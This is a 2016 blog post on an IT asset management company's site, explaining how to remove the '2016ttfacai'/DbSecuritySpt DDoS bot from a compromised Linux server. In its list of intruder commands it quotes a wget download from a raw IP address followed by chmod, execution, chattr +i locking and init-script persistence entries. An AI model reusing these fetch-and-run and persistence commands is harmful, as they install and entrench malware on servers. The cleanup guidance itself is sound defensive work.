×

HOW TO SHOP WITH US

1 Login or create new account.
2 Review your order.
3 Payment & FREE shipment

If you still have problems, please let us know, by sending an email to contact@itassetmanagement.in . Thank you!

SUPPORT TIMING

Mon-Fri 9:00AM - 9:00PM
Sat 9:00PM-5:00PM

SIGN IN YOUR ACCOUNT TO HAVE ACCESS TO DIFFERENT FEATURES

CREATE AN ACCOUNT FORGOT YOUR PASSWORD?

FORGOT YOUR DETAILS?

AAH, WAIT, I REMEMBER NOW!

CREATE ACCOUNT

ALREADY HAVE AN ACCOUNT?
QUESTIONS? CALL: T (91) 97690 22209, (91) 75066 00517, (+91) 22-66930155
  • LOGIN
  • SUPPORT

IT Asset Management Software

IT Asset Management Software

Best Inventorymanagement software

T (91) 97690 22209, (91) 75066 00517, (+91) 22-66930155
Email: contact@itassetmanagement.in

Greenitco
322, IT Park, MasterMind 1, Goregaon East Mumbai

Open in Google Maps
  • HOME
    • Services
      • IT Asset Management
      • ITM Mobile App
      • Asset Auditing
    • Features
      • Pricing Table
      • Features
      • Asset Management FAQ’s
    • Pages – Contact Us
      • Pages – Contact Us
      • Pages – About Us
      • Pages – Testimonials
      • Pages – Careers
        • Pages – F.A.Q.
  • OUR SERVICES
    • ITM
      • ITM SOFTWARE
      • Features
      • Pricing
      • IT Asset Management Premium Plan
      • IT Asset Management Professional Plan
      • IT Asset Management Ultimate Plan
    • ASSET-AUDITING
    • SOFTWARE LICENSES
      • Microsoft
      • GO Daddy
      • Cyberlink
  • DEMO
  • DOWNLOAD
    • MS Word Version Finder
      • How to install MS word version finder
    • Download ZIP
  • SHOP
    • Shop
    • My Account
      • Cart
      • Checkout
    • Anydesk Lite
    • Anydesk Lite 6 year
    • Apple
    • Microsoft
    • Cyperlink
    • Hosting
    • Pages – Contact Us
  • KNOWLEDGE CENTER
    • News & Updates
    • ITM – User Guide
    • Release Notes
  • CONTACT US
  • MY CART
    No products in cart.
FREESoftware
  • Home
  • Pages – Blog Posts
  • Comingtime
  • DDOS attack 2016ttfacai or DBsecurityspt
November 12, 2024

DDOS attack 2016ttfacai or DBsecurityspt

DDOS attack 2016ttfacai or DBsecurityspt

by admin / Saturday, 28 May 2016 / Published in Comingtime, Quick Tips, Technology Tips
Outbound ddos attack

Problem Statement:

Hacked: OUTBOUND DDOS attack 2016ttfacai  or DBsecurityspt SOLVED

 

If you detected an outbound denial of service attack originating from your server and its impacted your website. If you discover that a process internal to your server is sending large amounts of malicious traffic towards other servers and your service provider applied network restrictions to your server to mitigate this issue. Here is the way to solve this:-
Step 1: Put network restriction on your server for outgoing traffic. If you are using the Linux firewall
Go to 3rd Outgoing packets (OUTPUT) – Only applies to packets originated by this host

Dbsecuritysc

2016ttfacaii

Step 2: First create backup image of your server so that your data is not lost: CREATE SNAPSHOT

Step 3: If you are using Webmin look for BOOTUP and SHUTDOWN in System and look for Service “DBsecurity” If yes then your system is compromised
You will find service call 2016ttfacai is running and when you tried to kill. It will start again!
How to fix or Kill this Alien?
How to Kill 2016ttfacai
Step1: Create new virtual server and restore your backup snapshot created above.
Step2: Delete all the files from the following folder
1. /root/2016ttfacai
2. ./etc/init.d/DbSecuritySpt
3. etc/rc3.d/S97DbSecuritySpt
4. ./etc/rc3.d/S97DbSecuritySpt
5. ./etc/rc5.d/S97DbSecuritySpt
6. /temp/gates.lod/temp/mod.lod
7. /root/Conf.n

Manually stop all DBsecurityspt and 2016ttfacai from Services and Boot & Shutdown process
Repeat step2 again after stopping all the services
Step 3: Restart your server and see if above service are still running.

Outbound ddos attack

Outbound ddos attack

Note: If you are not able to delete files you need to running following command
# lsattr

if you notice i or a for 2016ttfacai
# man chattr
# chattr -i [filename] # chattr -a [filename]

Here what you can also check the commands run by the Alien
ps -ef
passwd
wget http://202.146.220.76:7777/2016ttfacai
chmod +x 2016ttfacai
./2016ttfacai
chattr +i 2016ttfacai
./etc/init.d/DbSecuritySpt:/root/2016ttfacai
./etc/rc3.d/S97DbSecuritySpt:/root/2016ttfacai
./etc/rc5.d/S97DbSecuritySpt:/root/2016ttfacai
./etc/rc4.d/S97DbSecuritySpt:/root/2016ttfacai
./etc/rc1.d/S97DbSecuritySpt:/root/2016ttfacai
Process: Summary:
11126
root 73.50 MB /root/2016ttfacai

If you succeeded in deleting the Alien and stopping all the services after restarting your server. Swap your ip with old server and delete old server.
Excellent you are back in business!!!
Say thank you to author

Details of 2016ttfacai:
https://www.virustotal.com/en/file/af67803032e08cfff4788a11693a9c96045bf35498faf126c8d8f20c1c6a3861/analysis/1459952498/
SHA256:af67803032e08cfff4788a11693a9c96045bf35498faf126c8d8f20c1c6a3861File name:2016ttfacaiDetection ratio:29 / 57Analysis date:2016-04-06 14:21:38 UTC ( 1 month, 3 weeks ago ) View latest
Class ELF32
Data 2’s complement, little endian
Header version 1 (current)
OS ABI UNIX – System V
ABI version 0
Object file type EXEC (Executable file)
Required architecture Intel 80386
Object file version 0x1
Program headers 5
Section headers 28
Name Type Address Offset Size Flags
NULL 0x00000000 0x00000000 0
.note.ABI-tag NOTE 0x080480d4 0x000000d4 32 A
.init PROGBITS 0x080480f4 0x000000f4 23 A, X
.text PROGBITS 0x08048120 0x00000120 744640 A, X
__libc_thread_freeres_fn PROGBITS 0x080fdde0 0x000b5de0 226 A, X
__libc_freeres_fn PROGBITS 0x080fdec4 0x000b5ec4 3950 A, X
.fini PROGBITS 0x080fee34 0x000b6e34 26 A, X
.rodata PROGBITS 0x080fee60 0x000b6e60 120986 A
__libc_atexit PROGBITS 0x0811c6fc 0x000d46fc 4 A
__libc_subfreeres PROGBITS 0x0811c700 0x000d4700 60 A

MIMEType
application/octet-stream

CPUByteOrder
Little endian

CPUArchitecture
32 bit

FileType
ELF executable

ObjectFileType
Executable file

CPUType
i386

0
  • Tweet
Tagged under: /root/2016ttfacai, 2016ttfacai, DBsecurityspt, DDOS attack 2016ttfacai, DDOS attack 2016ttfacai solved, DDOS Class ELF32, Gate.lod DDOS, not able to delete file from root ubuntu, outbound ddos DBsecurityspt, Outbound DDOS on webmin, wordpress outbound ddos
blank

About admin

What you can read next

Service Ticket Automation
Service ticket automation for business development
How the best helpdesk ticketing system can help in customer service?
How a helpdesk ticketing system benefits customer service?
ITM Services, Fixed Asset Auditing & Asset Management Compliance
Fixed Asset Auditing Procedures

Leave a Reply Cancel reply

Your email address will not be published.

Categories

  • Comingtime
  • Guide and Tutorial
  • Hacking
  • Helpdesk software
  • IT Asset Management
  • Mobile
  • Networking
  • News
  • Quick Tips
  • Service ticket automation
  • Technology
  • Technology Tips

Recent Posts

  • Greenitco Unveils MATI: Redefining Asset Management and Customer Support with AI

    AI-powered MATI promises to revolutionize asset...
  • Asset Management System benefits

    Importance of Asset Management System for Businesses

    Asset management refers to the collection of as...
  • Helpdesk system

    Benefits of helpdesk system for businesses

    Helpdesk system directly impacts productivity a...
  • Service Ticket Automation

    Service ticket automation for business development

    It has become essential for businesses to keep ...
  • asset management system

    Advantages of best asset management system

    The asset management system enables to record &...
  • ticketing system

    Best helpdesk ticketing system features for business development

    Delivering consistent customer service for the ...

Archives

  • April 2024
  • August 2022
  • June 2022
  • April 2022
  • March 2022
  • January 2022
  • December 2021
  • November 2021
  • September 2021
  • December 2019
  • October 2019
  • September 2019
  • July 2019
  • June 2019
  • May 2019
  • April 2019
  • March 2019
  • February 2019
  • January 2019
  • December 2018
  • November 2018
  • August 2018
  • May 2018
  • January 2017
  • June 2016
  • May 2016
  • April 2016
  • January 2016
  • December 2015
  • October 2015
  • August 2015

Featured Posts

  • Greenitco Unveils MATI: Redefining Asset Management and Customer Support with AI

    0 comments
  • Asset Management System benefits

    Importance of Asset Management System for Businesses

    0 comments
  • Helpdesk system

    Benefits of helpdesk system for businesses

    0 comments

GET IN TOUCH

MUMBAI
322 , Mastermind 1, IT park, Goregaon East
Royal Palms Mumbai – 400065 , India
Mob: 022-4604808, +91-9769022209

Open in Google Maps

FARIDABAD

Greenitco Technologies Pvt. Ltd.
Email: contact@itassetmanagement.in
FARIDABAD: 2454, Sanik Colony Faridabad, Haryana
Mob: 022-4604808, +91-9769022209

Email: contact@itassetmanagement.in Greenitco Technologies Pvt Ltd

  • GET SOCIAL
IT Asset Management Software

© 2023 All rights reserved. Contact us Greenitco
TERMS FOR USE PRIVACY POLICY EULA

TOP
Translate »

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close